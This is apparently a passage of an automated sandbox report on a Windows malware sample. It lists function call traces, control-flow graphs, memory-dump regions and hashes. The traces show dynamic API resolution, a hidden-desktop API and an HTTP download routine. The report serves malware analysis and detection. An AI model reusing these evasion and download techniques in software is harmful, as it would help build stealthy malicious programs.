                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: dbe69ca743466343f98b97ebaf5f3a4836342fc077aac5dc24f3ca66790ba5d4
                                  • Instruction ID: e9c888568d7ad376ae98e3d66af3d7399cbfd86f434671b19980074c1520043e
                                  • Opcode Fuzzy Hash: dbe69ca743466343f98b97ebaf5f3a4836342fc077aac5dc24f3ca66790ba5d4
                                  • Instruction Fuzzy Hash: 96F0B4B1A40208ABC720DFD8DD49B9EBBBCF704B21F000226FA15E3380D374194487A2
                                  Function 00FD66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 fd66e0-fd66e7 634 fd66ed-fd6af9 GetProcAddress * 43 633->634 635 fd6afe-fd6b92 LoadLibraryA * 8 633->635 634->635 636 fd6c08-fd6c0f 635->636 637 fd6b94-fd6c03 GetProcAddress * 5 635->637 638 fd6c15-fd6ccd GetProcAddress * 8 636->638 639 fd6cd2-fd6cd9 636->639 637->636 638->639 640 fd6d4f-fd6d56 639->640 641 fd6cdb-fd6d4a GetProcAddress * 5 639->641 642 fd6d5c-fd6de4 GetProcAddress * 6 640->642 643 fd6de9-fd6df0 640->643 641->640 642->643 644 fd6df6-fd6f0b GetProcAddress * 12 643->644 645 fd6f10-fd6f17 643->645 644->645 646 fd6f8d-fd6f94 645->646 647 fd6f19-fd6f88 GetProcAddress * 5 645->647 648 fd6f96-fd6fbc GetProcAddress * 2 646->648 649 fd6fc1-fd6fc8 646->649 647->646 648->649 650 fd6fca-fd6ff0 GetProcAddress * 2 649->650 651 fd6ff5-fd6ffc 649->651 650->651 652 fd70ed-fd70f4 651->652 653 fd7002-fd70e8 GetProcAddress * 10 651->653 654 fd70f6-fd714d GetProcAddress * 4 652->654 655 fd7152-fd7159 652->655 653->652 654->655 656 fd716e-fd7175 655->656 657 fd715b-fd7169 GetProcAddress 655->657 658 fd7177-fd71ce GetProcAddress * 4 656->658 659 fd71d3 656->659 657->656 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01B859F0), ref: 00FD66F5
                                  • GetProcAddress.KERNEL32(74DD0000,01B856F0), ref: 00FD670D
                                  • GetProcAddress.KERNEL32(74DD0000,01B996D0), ref: 00FD6726
                                  • GetProcAddress.KERNEL32(74DD0000,01B99628), ref: 00FD673E
                                  • GetProcAddress.KERNEL32(74DD0000,01B99658), ref: 00FD6756
                                  • GetProcAddress.KERNEL32(74DD0000,01B996A0), ref: 00FD676F
                                  • GetProcAddress.KERNEL32(74DD0000,01B8BD10), ref: 00FD6787
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D088), ref: 00FD679F
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D010), ref: 00FD67B8
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CFB0), ref: 00FD67D0
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D040), ref: 00FD67E8
                                  • GetProcAddress.KERNEL32(74DD0000,01B85970), ref: 00FD6801
                                  • GetProcAddress.KERNEL32(74DD0000,01B858B0), ref: 00FD6819
                                  • GetProcAddress.KERNEL32(74DD0000,01B85910), ref: 00FD6831
                                  • GetProcAddress.KERNEL32(74DD0000,01B85930), ref: 00FD684A
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D100), ref: 00FD6862
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF50), ref: 00FD687A
                                  • GetProcAddress.KERNEL32(74DD0000,01B8BD38), ref: 00FD6893
                                  • GetProcAddress.KERNEL32(74DD0000,01B85850), ref: 00FD68AB
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D160), ref: 00FD68C3
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF08), ref: 00FD68DC
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D0B8), ref: 00FD68F4
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF68), ref: 00FD690C
                                  • GetProcAddress.KERNEL32(74DD0000,01B85730), ref: 00FD6925
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF80), ref: 00FD693D
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D058), ref: 00FD6955
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D070), ref: 00FD696E
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D1A8), ref: 00FD6986
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D118), ref: 00FD699E
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D0A0), ref: 00FD69B7
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CFF8), ref: 00FD69CF
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D1C0), ref: 00FD69E7
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D0D0), ref: 00FD6A00
                                  • GetProcAddress.KERNEL32(74DD0000,01B9AAA0), ref: 00FD6A18
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF20), ref: 00FD6A30
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D190), ref: 00FD6A49
                                  • GetProcAddress.KERNEL32(74DD0000,01B85770), ref: 00FD6A61
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF98), ref: 00FD6A79
                                  • GetProcAddress.KERNEL32(74DD0000,01B85A10), ref: 00FD6A92
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D1D8), ref: 00FD6AAA
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D028), ref: 00FD6AC2
                                  • GetProcAddress.KERNEL32(74DD0000,01B85870), ref: 00FD6ADB
                                  • GetProcAddress.KERNEL32(74DD0000,01B85DB0), ref: 00FD6AF3
                                  • LoadLibraryA.KERNEL32(01B9CFC8,00FD051F), ref: 00FD6B05
                                  • LoadLibraryA.KERNEL32(01B9D130), ref: 00FD6B16
                                  • LoadLibraryA.KERNEL32(01B9D0E8), ref: 00FD6B28
                                  • LoadLibraryA.KERNEL32(01B9CF38), ref: 00FD6B3A
                                  • LoadLibraryA.KERNEL32(01B9D178), ref: 00FD6B4B
                                  • LoadLibraryA.KERNEL32(01B9D148), ref: 00FD6B5D
                                  • LoadLibraryA.KERNEL32(01B9CFE0), ref: 00FD6B6F
                                  • LoadLibraryA.KERNEL32(01B9D1F0), ref: 00FD6B80
                                  • GetProcAddress.KERNEL32(75290000,01B85C30), ref: 00FD6B9C
                                  • GetProcAddress.KERNEL32(75290000,01B9D388), ref: 00FD6BB4
                                  • GetProcAddress.KERNEL32(75290000,01B99068), ref: 00FD6BCD
                                  • GetProcAddress.KERNEL32(75290000,01B9D4D8), ref: 00FD6BE5
                                  • GetProcAddress.KERNEL32(75290000,01B85DD0), ref: 00FD6BFD
                                  • GetProcAddress.KERNEL32(6FD60000,01B8B860), ref: 00FD6C1D
                                  • GetProcAddress.KERNEL32(6FD60000,01B85E50), ref: 00FD6C35
                                  • GetProcAddress.KERNEL32(6FD60000,01B8B680), ref: 00FD6C4E
                                  • GetProcAddress.KERNEL32(6FD60000,01B9D400), ref: 00FD6C66
                                  • GetProcAddress.KERNEL32(6FD60000,01B9D358), ref: 00FD6C7E
                                  • GetProcAddress.KERNEL32(6FD60000,01B85C50), ref: 00FD6C97
                                  • GetProcAddress.KERNEL32(6FD60000,01B85AB0), ref: 00FD6CAF
                                  • GetProcAddress.KERNEL32(6FD60000,01B9D328), ref: 00FD6CC7
                                  • GetProcAddress.KERNEL32(752C0000,01B85D10), ref: 00FD6CE3
                                  • GetProcAddress.KERNEL32(752C0000,01B85C70), ref: 00FD6CFB
                                  • GetProcAddress.KERNEL32(752C0000,01B9D430), ref: 00FD6D14
                                  • GetProcAddress.KERNEL32(752C0000,01B9D370), ref: 00FD6D2C
                                  • GetProcAddress.KERNEL32(752C0000,01B85E30), ref: 00FD6D44
                                  • GetProcAddress.KERNEL32(74EC0000,01B8B770), ref: 00FD6D64
                                  • GetProcAddress.KERNEL32(74EC0000,01B8B6F8), ref: 00FD6D7C
                                  • GetProcAddress.KERNEL32(74EC0000,01B9D490), ref: 00FD6D95
                                  • GetProcAddress.KERNEL32(74EC0000,01B85B50), ref: 00FD6DAD
                                  • GetProcAddress.KERNEL32(74EC0000,01B85CD0), ref: 00FD6DC5
                                  • GetProcAddress.KERNEL32(74EC0000,01B8B720), ref: 00FD6DDE
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D4F0), ref: 00FD6DFE
                                  • GetProcAddress.KERNEL32(75BD0000,01B85DF0), ref: 00FD6E16
                                  • GetProcAddress.KERNEL32(75BD0000,01B98F98), ref: 00FD6E2F
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D208), ref: 00FD6E47
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D238), ref: 00FD6E5F
                                  • GetProcAddress.KERNEL32(75BD0000,01B85BB0), ref: 00FD6E78
                                  • GetProcAddress.KERNEL32(75BD0000,01B85BD0), ref: 00FD6E90
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D418), ref: 00FD6EA8
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D340), ref: 00FD6EC1
                                  • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00FD6ED7
                                  • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00FD6EEE
                                  • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00FD6F05
                                  • GetProcAddress.KERNEL32(75A70000,01B85AD0), ref: 00FD6F21
                                  • GetProcAddress.KERNEL32(75A70000,01B9D4C0), ref: 00FD6F39
                                  • GetProcAddress.KERNEL32(75A70000,01B9D448), ref: 00FD6F52
                                  • GetProcAddress.KERNEL32(75A70000,01B9D3A0), ref: 00FD6F6A
                                  • GetProcAddress.KERNEL32(75A70000,01B9D3B8), ref: 00FD6F82
                                  • GetProcAddress.KERNEL32(75450000,01B85CF0), ref: 00FD6F9E
                                  • GetProcAddress.KERNEL32(75450000,01B85C90), ref: 00FD6FB6
                                  • GetProcAddress.KERNEL32(75DA0000,01B85AF0), ref: 00FD6FD2
                                  • GetProcAddress.KERNEL32(75DA0000,01B9D460), ref: 00FD6FEA
                                  • GetProcAddress.KERNEL32(6F070000,01B85B10), ref: 00FD700A
                                  • GetProcAddress.KERNEL32(6F070000,01B85D50), ref: 00FD7022
                                  • GetProcAddress.KERNEL32(6F070000,01B85B30), ref: 00FD703B
                                  • GetProcAddress.KERNEL32(6F070000,01B9D2B0), ref: 00FD7053
                                  • GetProcAddress.KERNEL32(6F070000,01B85B70), ref: 00FD706B
                                  • GetProcAddress.KERNEL32(6F070000,01B85B90), ref: 00FD7084
                                  • GetProcAddress.KERNEL32(6F070000,01B85BF0), ref: 00FD709C
                                  • GetProcAddress.KERNEL32(6F070000,01B85D30), ref: 00FD70B4
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FD70CB
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FD70E2
                                  • GetProcAddress.KERNEL32(75AF0000,01B9D478), ref: 00FD70FE
                                  • GetProcAddress.KERNEL32(75AF0000,01B990B8), ref: 00FD7116
                                  • GetProcAddress.KERNEL32(75AF0000,01B9D220), ref: 00FD712F
                                  • GetProcAddress.KERNEL32(75AF0000,01B9D280), ref: 00FD7147
                                  • GetProcAddress.KERNEL32(75D90000,01B85E10), ref: 00FD7163
                                  • GetProcAddress.KERNEL32(6CE80000,01B9D4A8), ref: 00FD717F
                                  • GetProcAddress.KERNEL32(6CE80000,01B85C10), ref: 00FD7197
                                  • GetProcAddress.KERNEL32(6CE80000,01B9D310), ref: 00FD71B0
                                  • GetProcAddress.KERNEL32(6CE80000,01B9D250), ref: 00FD71C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: ade74dd934259a48e7c3c7bf5104f60ebd8463a4fdb5ae583a13a84eb11aeead
                                  • Instruction ID: cc613b2750e69395657fff0b8934993a7ca37dd7ac7726312ac4fbd2e0e993a6
                                  • Opcode Fuzzy Hash: ade74dd934259a48e7c3c7bf5104f60ebd8463a4fdb5ae583a13a84eb11aeead
                                  • Instruction Fuzzy Hash: 00624FF55102089FD77CDFE5E988A263BFAF7886093408939E9758B348D734A9C0DB61
                                  Function 00FCF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FCF1D5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF1F1
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FCF1FC
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF215
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FCF220
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF239
                                  • lstrcpy.KERNEL32(00000000,00FE4FA0), ref: 00FCF25E
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF28C
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF2C0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF2F0
                                  • lstrlen.KERNEL32(01B85710), ref: 00FCF315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: ae8e53ea32d3ec4fab06a8801b63a1e41ef9614d45fd4230a26a64d9961cb3ae
                                  • Instruction ID: 41410079d46b17b5d76c0312c879e6aa38ef0a34795a73a75717cee2cbabc38a
                                  • Opcode Fuzzy Hash: ae8e53ea32d3ec4fab06a8801b63a1e41ef9614d45fd4230a26a64d9961cb3ae
                                  • Instruction Fuzzy Hash: BAA24830D012068FCB28EFA5CA49B9AFBF6AF44324B18807DE8199B255DB35DC45EB50
                                  Function 00FCFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0013
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD00BD
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD00E1
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD00EC
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0110
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD011B
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD013F
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD015A
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0189
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD0194
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD01C3
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD01CE
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0206
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD0250
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD059B
                                  • lstrlen.KERNEL32(01B859B0), ref: 00FD05AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD05D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD05E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD060E
                                  • lstrlen.KERNEL32(01B9E388), ref: 00FD0625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD0658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD0681
                                  • lstrlen.KERNEL32(01B85A50), ref: 00FD0698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD06C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD06D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD0706
                                  • lstrcpy.KERNEL32(00000000,01B99098), ref: 00FD074B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD077F
                                  • lstrcpy.KERNEL32(00000000,01B9E298), ref: 00FD07E7
                                  • lstrcpy.KERNEL32(00000000,01B99298), ref: 00FD0858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 00FD08CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD0928
                                  • lstrcpy.KERNEL32(00000000,01B991C8), ref: 00FD09F8
                                    • Part of subcall function 00FB24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FB2528
                                    • Part of subcall function 00FB24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FB254E
                                    • Part of subcall function 00FB24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FB2577
                                  • lstrcpy.KERNEL32(00000000,01B99268), ref: 00FD0ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD0B81
                                  • lstrcpy.KERNEL32(00000000,01B99268), ref: 00FD0D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 158f4e76cf76960e750a063ab5d1612d860fec5616372d143653eabe736d52ae
                                  • Instruction ID: 4be00d8b8dd71b9c9770602b32a4dd953608919cdbdf1a1c461a312186f07051
                                  • Opcode Fuzzy Hash: 158f4e76cf76960e750a063ab5d1612d860fec5616372d143653eabe736d52ae
                                  • Instruction Fuzzy Hash: 69E25871A053418FD734DF29C888B5ABBE2BF88324F58856EE4898B352DB35D841DF52
                                  Function 00FB6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2234 fb6c40-fb6c64 call fb2930 2237 fb6c66-fb6c6b 2234->2237 2238 fb6c75-fb6c97 call fb4bc0 2234->2238 2237->2238 2240 fb6c6d-fb6c6f lstrcpy 2237->2240 2242 fb6caa-fb6cba call fb2930 2238->2242 2243 fb6c99 2238->2243 2240->2238 2247 fb6cc8-fb6cf5 InternetOpenA StrCmpCA 2242->2247 2248 fb6cbc-fb6cc2 lstrcpy 2242->2248 2244 fb6ca0-fb6ca8 2243->2244 2244->2242 2244->2244 2249 fb6cfa-fb6cfc 2247->2249 2250 fb6cf7 2247->2250 2248->2247 2251 fb6ea8-fb6ebb call fb2930 2249->2251 2252 fb6d02-fb6d22 InternetConnectA 2249->2252 2250->2249 2259 fb6ec9-fb6ee0 call fb2a20 * 2 2251->2259 2260 fb6ebd-fb6ebf 2251->2260 2253 fb6d28-fb6d5d HttpOpenRequestA 2252->2253 2254 fb6ea1-fb6ea2 InternetCloseHandle 2252->2254 2257 fb6d63-fb6d65 2253->2257 2258 fb6e94-fb6e9e InternetCloseHandle 2253->2258 2254->2251 2261 fb6d7d-fb6dad HttpSendRequestA HttpQueryInfoA 2257->2261 2262 fb6d67-fb6d77 InternetSetOptionA 2257->2262 2258->2254 2260->2259 2265 fb6ec1-fb6ec3 lstrcpy 2260->2265 2263 fb6daf-fb6dd3 call fd71e0 call fb2a20 * 2 2261->2263 2264 fb6dd4-fb6de4 call fd3d90 2261->2264 2262->2261 2264->2263 2275 fb6de6-fb6de8 2264->2275 2265->2259 2277 fb6dee-fb6e07 InternetReadFile 2275->2277 2278 fb6e8d-fb6e8e InternetCloseHandle 2275->2278 2277->2278 2280 fb6e0d 2277->2280 2278->2258 2282 fb6e10-fb6e15 2280->2282 2282->2278 2283 fb6e17-fb6e3d call fd7310 2282->2283 2286 fb6e3f call fb2a20 2283->2286 2287 fb6e44-fb6e51 call fb2930 2283->2287 2286->2287 2291 fb6e53-fb6e57 2287->2291 2292 fb6e61-fb6e8b call fb2a20 InternetReadFile 2287->2292 2291->2292 2293 fb6e59-fb6e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB6C6F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6CC2
                                  • InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB6CD5
                                  • StrCmpCA.SHLWAPI(?,01B9E968), ref: 00FB6CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,01B9E568,00000000,00000000,-00400100,00000000), ref: 00FB6D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FB6D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB6D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FB6DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB6DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB6E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00FB6E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB6E8E
                                  • InternetCloseHandle.WININET(?), ref: 00FB6E98
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB6EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB6EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
